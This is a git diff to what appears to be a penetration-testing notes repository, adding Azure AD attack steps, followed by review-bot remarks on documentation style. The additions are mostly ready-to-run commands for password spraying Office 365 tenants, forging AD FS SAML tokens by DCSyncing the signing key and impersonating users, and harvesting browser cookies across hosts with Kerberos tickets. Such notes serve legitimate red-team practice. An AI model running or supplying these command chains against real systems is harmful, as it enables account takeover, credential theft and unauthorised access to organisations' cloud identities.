diff --git a/pentest/infrastructure/azure-ad/README.md b/pentest/infrastructure/azure-ad/README.md index f409b45..d976aa3 100644 --- a/pentest/infrastructure/azure-ad/README.md +++ b/pentest/infrastructure/azure-ad/README.md @@ -11,3 +11,18 @@ ## OSINT - [https://aadinternals.com/osint/](https://aadinternals.com/osint/) + + + + +## Password Spray + +Using [o365spray](https://github.com/0xZDH/o365spray) (random user agents [here](https://iplogger.org/ru/useragents/)): + +``` +$ pipx install -f "git+https://github.com/0xZDH/o365spray.git" +$ o365spray --validate -d megacorp.cloud +$ o365spray --enum -d megacorp.cloud -u snovvcrash +$ o365spray --enum -d megacorp.cloud -U names.txt +$ o365spray --spray -d megacorp.cloud -U names.txt -p 'Passw0rd!' --sleep 5 --rate 1 --useragents ua.txt +``` diff --git a/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md b/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md index 5f0ce81..f606fcb 100644 --- a/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md +++ b/pentest/infrastructure/azure-ad/on-prem-cloud/on-prem-cloud.md 
@@ -25,14 +25,71 @@ +## Forging AD FS SAML Tokens + +- [https://aadinternals.com/post/adfs/](https://aadinternals.com/post/adfs/) + +Get AD FS config: + +``` +AADInt > $ADFSConfig = Export-AADIntADFSConfiguration -Hash -SID -Server ADFS01.megacorp.local +``` + +Get private key object GUID: + +``` +PV3 > Get-DomainObject -LDAPFilter "(&(objectclass=contact)(!name=CryptoPolicy)(ThumbnailPhoto=*))" -SearchBase "CN=ADFS,CN=Microsoft,CN=Program Data,DC=megacorp,DC=local" | select objectGuid +``` + +Ensure you have enough privileges to DCSync: + +``` +Cmd > Rubeus.exe asktgt /user:DC01$ /domain:megacorp.local /dc:DC01.megacorp.local /aes256: /opsec /nowrap /ptt +Cmd > Rubeus.exe asktgs /ticket: /domain:megacorp.local /dc:DC01.megacorp.local /service:LDAP/DC01.megacorp.local /nowrap /ptt +``` + +DCSync the key: + +{% hint style="info" %} +We don't actually need clear-text creds to replicate the key if we've already imported a privileged TGT, so `$Credentials` ([here](https://github.com/Gerenios/AADInternals/blob/49a9659b60672f08428e72148b66dfe4629562da/DRS_Utils.ps1#L242)) can be omitted. 
+{% endhint %} + +``` +AADInt > $ADFSKey = Export-AADIntADFSEncryptionKey -Server DC01.megacorp.local -ObjectGuid -Credentials "dummy" +PS > [System.BitConverter]::ToString($ADFSKey) +``` + +Generate the token signing certificate: + +``` +AADInt > Export-AADIntADFSCertificates -Configuration $ADFSConfig -Key $ADFSKey +PS > ls ADFS_* +``` + +Get AD FS trust issuer as well as on-prem users' immutable cloud IDs: + +``` +ADFS > $Issuer = (Get-ADFSProperties).Identifier.OriginalString +PV3 > Get-DomainUser | select UserPrincipalname, @{Name="ImmutableId"; Expression={"$([Convert]::ToBase64String(([guid]$_.ObjectGuid).ToByteArray()))"}} +``` + +Impersonate and login: + +``` +AADInt > Open-AADIntOffice365Portal -ImmutableId -PfxFileName .\ADFS_signing.pfx -Issuer $Issuer +``` + + + + ## Mass Cookies Harvesting Collect with [dploot](https://github.com/zblurx/dploot): ``` -$ ls silver_tickets/ +$ ls tickets/ SRV01.ccache SRV02.ccache PC01.ccache -$ for st in `ls silver_tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="silver_tickets/$st" proxychains4 dploot browser -d megacorp.local -no-pass -use-kcache "$comp.megacorp.local" -pvk ../key.pvk -show-cookies > "browsers_$comp.out"; done +$ for st in `ls tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="tickets/$st" proxychains4 dploot browser -d megacorp.local -no-pass -use-kcache "$comp.megacorp.local" -pvk ../key.pvk -show-cookies > "browsers_$comp.out"; done ``` Search for `ESTSAUTHPERSISTENT` cookies: 
@@ -77,10 +134,10 @@ def do_hidden(self, args=None): Collect hidden directories: ``` -$ ls silver_tickets/ +$ ls tickets/ SRV01.ccache SRV02.ccache PC01.ccache $ echo 'use c$\nhidden' > cmd -$ for st in `ls silver_tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="silver_tickets/$st" proxychains4 smbclient.py -k -no-pass "$comp.megacorp.local" -inputfile cmd -outputfile "hidden_$comp.out"; done +$ for st in `ls tickets/`; do comp=`basename $st .ccache`; KRB5CCNAME="tickets/$st" proxychains4 smbclient.py -k -no-pass "$comp.megacorp.local" -inputfile cmd -outputfile "hidden_$comp.out"; done ``` Search for hidden directories that start with `.az`:
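Review bot: in the README.md hunk (`@@ -11,3 +11,18 @@`), the `--enum` line hard-codes the author's handle `snovvcrash` as the username while every other value in the block uses the placeholder domain `megacorp.cloud`; use a placeholder such as `-u <username>` so readers do not copy a real identity. The "random user agents" link resolves to iplogger.org, a click-tracking service, so a plain user-agent list (or a note on the expected format of `ua.txt`, which is only referenced via `--useragents ua.txt`) would serve readers better. The throttling flags `--sleep 5 --rate 1` are given without explanation; one sentence on what each of them limits would help anyone who copies the spray line as-is.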
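Review bot: in the on-prem-cloud.md hunk (`@@ -25,14 +25,71 @@`), several commands in the new "Forging AD FS SAML Tokens" section have empty parameter values: `/aes256:` and `/ticket:` in the two Rubeus lines, `-ObjectGuid` in `Export-AADIntADFSEncryptionKey`, and `-ImmutableId` in `Open-AADIntOffice365Portal`. As written they are not copy-pasteable and a reader cannot tell whether the value was deliberately elided; explicit placeholders (e.g. `/aes256:<AES256_KEY>`, `-ObjectGuid <OBJECT_GUID>`, `-ImmutableId <IMMUTABLE_ID>`) make the shape of each argument clear. The hint and the command that follows it also disagree: the hint says `$Credentials` "can be omitted", yet the command still passes `-Credentials "dummy"`; either the argument can be dropped (then drop it from the command) or it is mandatory but unused once a privileged TGT is imported (then say so in the hint). Finally, the prompt prefixes `AADInt >`, `PV3 >`, `Cmd >`, `PS >` and `ADFS >` are not defined anywhere in the hunk; a one-line legend naming the tool or session each prefix stands for would help.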
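Review bot: in the hidden-directories hunk (`@@ -77,10 +134,10 @@`), the `silver_tickets/` to `tickets/` rename is applied consistently to both the `ls` line and the `for` loop, matching the cookies hunk above, but the commit carries no note on why the directory was renamed; a word on the reason would help. One caveat on the unchanged context line `echo 'use c$\nhidden' > cmd`: under bash, `echo` does not interpret `\n` without `-e`, so `cmd` would contain the single line `use c$\nhidden` rather than two lines, while dash's builtin `echo` does expand it; `printf 'use c$\nhidden\n' > cmd` behaves the same in every POSIX shell.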